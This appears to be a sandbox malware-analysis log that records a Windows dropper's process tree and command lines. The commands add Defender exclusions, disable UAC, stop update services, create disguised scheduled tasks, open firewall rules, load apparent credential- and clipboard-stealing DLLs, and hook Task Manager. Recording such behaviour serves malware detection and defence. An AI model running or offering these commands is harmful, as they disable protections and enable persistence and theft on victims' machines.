PID 932 wrote to memory of 4896 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\TGbHTIuRYu12xMG6nWaxWvI6.exe
PID 932 wrote to memory of 4896 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\TGbHTIuRYu12xMG6nWaxWvI6.exe
PID 932 wrote to memory of 4896 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\TGbHTIuRYu12xMG6nWaxWvI6.exe
PID 932 wrote to memory of 428 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe
PID 932 wrote to memory of 428 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe
PID 932 wrote to memory of 428 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe
PID 932 wrote to memory of 5100 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\shZ2QlXdkmTmsk4zR41gLVc7.exe
PID 932 wrote to memory of 5100 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\shZ2QlXdkmTmsk4zR41gLVc7.exe
PID 932 wrote to memory of 5100 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\shZ2QlXdkmTmsk4zR41gLVc7.exe
PID 1268 wrote to memory of 4736 N/A C:\Users\Admin\Pictures\8Q2InRdoMAfSeMpX80tmerhI.exe C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
PID 1268 wrote to memory of 4736 N/A C:\Users\Admin\Pictures\8Q2InRdoMAfSeMpX80tmerhI.exe C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
PID 1268 wrote to memory of 4736 N/A C:\Users\Admin\Pictures\8Q2InRdoMAfSeMpX80tmerhI.exe C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
PID 932 wrote to memory of 4200 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\62feVopRHxuPs3P80VoHsWds.exe
PID 932 wrote to memory of 4200 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\62feVopRHxuPs3P80VoHsWds.exe
PID 932 wrote to memory of 4628 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\IURAaM4iBeaOTAHNc2vSNNs3.exe
PID 932 wrote to memory of 4628 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\IURAaM4iBeaOTAHNc2vSNNs3.exe
PID 932 wrote to memory of 4628 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\IURAaM4iBeaOTAHNc2vSNNs3.exe
PID 4896 wrote to memory of 4940 N/A C:\Users\Admin\Pictures\TGbHTIuRYu12xMG6nWaxWvI6.exe C:\Users\Admin\AppData\Local\Temp\is-H9RIU.tmp\TGbHTIuRYu12xMG6nWaxWvI6.tmp
PID 4896 wrote to memory of 4940 N/A C:\Users\Admin\Pictures\TGbHTIuRYu12xMG6nWaxWvI6.exe C:\Users\Admin\AppData\Local\Temp\is-H9RIU.tmp\TGbHTIuRYu12xMG6nWaxWvI6.tmp
PID 4896 wrote to memory of 4940 N/A C:\Users\Admin\Pictures\TGbHTIuRYu12xMG6nWaxWvI6.exe C:\Users\Admin\AppData\Local\Temp\is-H9RIU.tmp\TGbHTIuRYu12xMG6nWaxWvI6.tmp
PID 3080 wrote to memory of 3828 N/A C:\Users\Admin\Pictures\lOvBq1ctYKdsFYCAOEiEgMz2.exe C:\Users\Admin\AppData\Local\Temp\is-JTV0M.tmp\lOvBq1ctYKdsFYCAOEiEgMz2.tmp
PID 3080 wrote to memory of 3828 N/A C:\Users\Admin\Pictures\lOvBq1ctYKdsFYCAOEiEgMz2.exe C:\Users\Admin\AppData\Local\Temp\is-JTV0M.tmp\lOvBq1ctYKdsFYCAOEiEgMz2.tmp
PID 3080 wrote to memory of 3828 N/A C:\Users\Admin\Pictures\lOvBq1ctYKdsFYCAOEiEgMz2.exe C:\Users\Admin\AppData\Local\Temp\is-JTV0M.tmp\lOvBq1ctYKdsFYCAOEiEgMz2.tmp
PID 932 wrote to memory of 812 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\Q0fnIUXTM79rNZPhQcruvlJ5.exe
PID 932 wrote to memory of 812 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\Q0fnIUXTM79rNZPhQcruvlJ5.exe
PID 932 wrote to memory of 812 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\Q0fnIUXTM79rNZPhQcruvlJ5.exe
PID 932 wrote to memory of 2248 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe
PID 932 wrote to memory of 2248 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe
PID 932 wrote to memory of 2248 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe
PID 932 wrote to memory of 4104 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\bu5UWBMNJxJyXBl36BFg9XOI.exe
PID 932 wrote to memory of 4104 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\bu5UWBMNJxJyXBl36BFg9XOI.exe
PID 2248 wrote to memory of 2472 N/A C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe
PID 2248 wrote to memory of 2472 N/A C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe
PID 2248 wrote to memory of 2472 N/A C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe
PID 4736 wrote to memory of 1544 N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe C:\Windows\SysWOW64\schtasks.exe
PID 4736 wrote to memory of 1544 N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe C:\Windows\SysWOW64\schtasks.exe
PID 4736 wrote to memory of 1544 N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe C:\Windows\SysWOW64\schtasks.exe
PID 4736 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe C:\Windows\SysWOW64\cmd.exe
PID 4736 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe C:\Windows\SysWOW64\cmd.exe
PID 4736 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe C:\Windows\SysWOW64\cmd.exe
PID 3828 wrote to memory of 3704 N/A C:\Users\Admin\AppData\Local\Temp\is-JTV0M.tmp\lOvBq1ctYKdsFYCAOEiEgMz2.tmp C:\Users\Admin\AppData\Local\Temp\is-UJ6HF.tmp\_isetup\_setup64.tmp
PID 3828 wrote to memory of 3704 N/A C:\Users\Admin\AppData\Local\Temp\is-JTV0M.tmp\lOvBq1ctYKdsFYCAOEiEgMz2.tmp C:\Users\Admin\AppData\Local\Temp\is-UJ6HF.tmp\_isetup\_setup64.tmp
PID 2248 wrote to memory of 1200 N/A C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\O7qOvO0qMmQjettcsUNpgMj9.exe
PID 2248 wrote to memory of 1200 N/A C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\O7qOvO0qMmQjettcsUNpgMj9.exe
PID 2248 wrote to memory of 1200 N/A C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\O7qOvO0qMmQjettcsUNpgMj9.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe N/A

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe

"C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

C:\Users\Admin\Pictures\shZ2QlXdkmTmsk4zR41gLVc7.exe

"C:\Users\Admin\Pictures\shZ2QlXdkmTmsk4zR41gLVc7.exe"

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

"C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe"

C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe

"C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe" --silent --allusers=0

C:\Users\Admin\Pictures\Q0fnIUXTM79rNZPhQcruvlJ5.exe

"C:\Users\Admin\Pictures\Q0fnIUXTM79rNZPhQcruvlJ5.exe"

C:\Users\Admin\AppData\Local\Temp\is-JTV0M.tmp\lOvBq1ctYKdsFYCAOEiEgMz2.tmp

"C:\Users\Admin\AppData\Local\Temp\is-JTV0M.tmp\lOvBq1ctYKdsFYCAOEiEgMz2.tmp" /SL5="$801F2,5025136,832512,C:\Users\Admin\Pictures\lOvBq1ctYKdsFYCAOEiEgMz2.exe" /SP- /VERYSILENT /SUPPRESSMSGBOXES /PID=5333

C:\Users\Admin\AppData\Local\Temp\is-H9RIU.tmp\TGbHTIuRYu12xMG6nWaxWvI6.tmp

"C:\Users\Admin\AppData\Local\Temp\is-H9RIU.tmp\TGbHTIuRYu12xMG6nWaxWvI6.tmp" /SL5="$E01C2,491750,408064,C:\Users\Admin\Pictures\TGbHTIuRYu12xMG6nWaxWvI6.exe"

C:\Users\Admin\Pictures\62feVopRHxuPs3P80VoHsWds.exe

"C:\Users\Admin\Pictures\62feVopRHxuPs3P80VoHsWds.exe"

C:\Users\Admin\Pictures\IURAaM4iBeaOTAHNc2vSNNs3.exe

"C:\Users\Admin\Pictures\IURAaM4iBeaOTAHNc2vSNNs3.exe"

C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe

"C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe"

C:\Users\Admin\Pictures\TGbHTIuRYu12xMG6nWaxWvI6.exe

"C:\Users\Admin\Pictures\TGbHTIuRYu12xMG6nWaxWvI6.exe"

C:\Users\Admin\Pictures\lOvBq1ctYKdsFYCAOEiEgMz2.exe

"C:\Users\Admin\Pictures\lOvBq1ctYKdsFYCAOEiEgMz2.exe" /SP- /VERYSILENT /SUPPRESSMSGBOXES /PID=5333

C:\Users\Admin\Pictures\0N3ystHYqNLyMAmfyjBLWUL1.exe

"C:\Users\Admin\Pictures\0N3ystHYqNLyMAmfyjBLWUL1.exe"

C:\Users\Admin\Pictures\8Q2InRdoMAfSeMpX80tmerhI.exe

"C:\Users\Admin\Pictures\8Q2InRdoMAfSeMpX80tmerhI.exe"

C:\Users\Admin\Pictures\bu5UWBMNJxJyXBl36BFg9XOI.exe

"C:\Users\Admin\Pictures\bu5UWBMNJxJyXBl36BFg9XOI.exe"

C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe

C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.16 --initial-client-data=0x2b4,0x2b8,0x2bc,0x290,0x2c0,0x6e4c8538,0x6e4c8548,0x6e4c8554

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nhdues.exe /TR "C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nhdues.exe" /P "Admin:N"&&CACLS "nhdues.exe" /P "Admin:R" /E&&echo Y|CACLS "..\1ff8bec27e" /P "Admin:N"&&CACLS "..\1ff8bec27e" /P "Admin:R" /E&&Exit

C:\Users\Admin\AppData\Local\Temp\is-UJ6HF.tmp\_isetup\_setup64.tmp

helper 105 0x3AC

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\O7qOvO0qMmQjettcsUNpgMj9.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\O7qOvO0qMmQjettcsUNpgMj9.exe" --version

C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe

"C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=2248 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20231005044957" --session-guid=0bfebdaf-9e16-4d8a-b13d-fd63557a5ec3 --server-tracking-blob=NGYyZTNlYmNkNjRhNmUwMTliNTRmNjZkMzc1ZDlmYTQ3NDIwMGRkYTE0NGNjN2YyZTFmZWM1NzcxMzcxNTUwNzp7ImNvdW50cnkiOiJVUyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTY5NjQ4MTM4OC4yNTUwIiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiIyMDMzMzMzNy00ZWRmLTQ0N2ItYmU5Ni1lOTk5Njc3MzIyYmYifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=C004000000000000

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe

C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.16 --initial-client-data=0x2c0,0x2c4,0x2c8,0x290,0x2cc,0x6ca38538,0x6ca38548,0x6ca38554

C:\Windows\SysWOW64\cacls.exe

CACLS "nhdues.exe" /P "Admin:N"

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Windows\system32\schtasks.exe

"schtasks" /Query /TN "DigitalPulseUpdateTask"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Users\Admin\AppData\Local\Temp\is-OKMTS.tmp\8758677____.exe

"C:\Users\Admin\AppData\Local\Temp\is-OKMTS.tmp\8758677____.exe" /S /UID=lylal220

C:\Windows\system32\schtasks.exe

"schtasks" /Create /TN "DigitalPulseUpdateTask" /SC HOURLY /TR "C:\Users\Admin\AppData\Roaming\DigitalPulse\DigitalPulseUpdate.exe"

C:\Windows\SysWOW64\cacls.exe

CACLS "nhdues.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\1ff8bec27e" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\1ff8bec27e" /P "Admin:R" /E

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4628 -s 2296

C:\Users\Admin\AppData\Roaming\DigitalPulse\DigitalPulseService.exe

"C:\Users\Admin\AppData\Roaming\DigitalPulse\DigitalPulseService.exe" 5333:::clickId=:::srcId=

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\xyvvnnvseiqa.xml"

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Users\Admin\AppData\Local\Temp\50-12455-789-680a2-6b7bd6c441069\Wucihaewypi.exe

"C:\Users\Admin\AppData\Local\Temp\50-12455-789-680a2-6b7bd6c441069\Wucihaewypi.exe"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe

dw20.exe -x -s 716

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050449571\assistant\Assistant_100.0.4815.21_Setup.exe_sfx.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050449571\assistant\Assistant_100.0.4815.21_Setup.exe_sfx.exe"

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll, Main

C:\Windows\system32\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll, Main

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\clip64.dll, Main

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050449571\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050449571\assistant\assistant_installer.exe" --version

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050449571\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050449571\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=100.0.4815.21 --initial-client-data=0x248,0x24c,0x250,0x224,0x254,0xbce8a0,0xbce8b0,0xbce8bc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\xyvvnnvseiqa.xml"

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5100 -s 1636

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\0709047991.exe"

C:\Users\Admin\AppData\Local\Temp\0709047991.exe

"C:\Users\Admin\AppData\Local\Temp\0709047991.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "0N3ystHYqNLyMAmfyjBLWUL1.exe" /f & erase "C:\Users\Admin\Pictures\0N3ystHYqNLyMAmfyjBLWUL1.exe" & exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "0N3ystHYqNLyMAmfyjBLWUL1.exe" /f

C:\Windows\syswow64\rundll32.exe

"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61 C:\Users\Admin\AppData\Local\Temp\0709047991.exe

C:\Users\Admin\AppData\Local\Temp\ZJOHAHEIQG\lightcleaner.exe

"C:\Users\Admin\AppData\Local\Temp\ZJOHAHEIQG\lightcleaner.exe" /VERYSILENT

C:\Users\Admin\AppData\Local\Temp\is-VN4PV.tmp\lightcleaner.tmp

"C:\Users\Admin\AppData\Local\Temp\is-VN4PV.tmp\lightcleaner.tmp" /SL5="$3024E,833775,56832,C:\Users\Admin\AppData\Local\Temp\ZJOHAHEIQG\lightcleaner.exe" /VERYSILENT

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\servicing\TrustedInstaller.exe

C:\Users\Admin\Pictures\Q0fnIUXTM79rNZPhQcruvlJ5.exe

"C:\Users\Admin\Pictures\Q0fnIUXTM79rNZPhQcruvlJ5.exe"

C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe

"C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\System32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

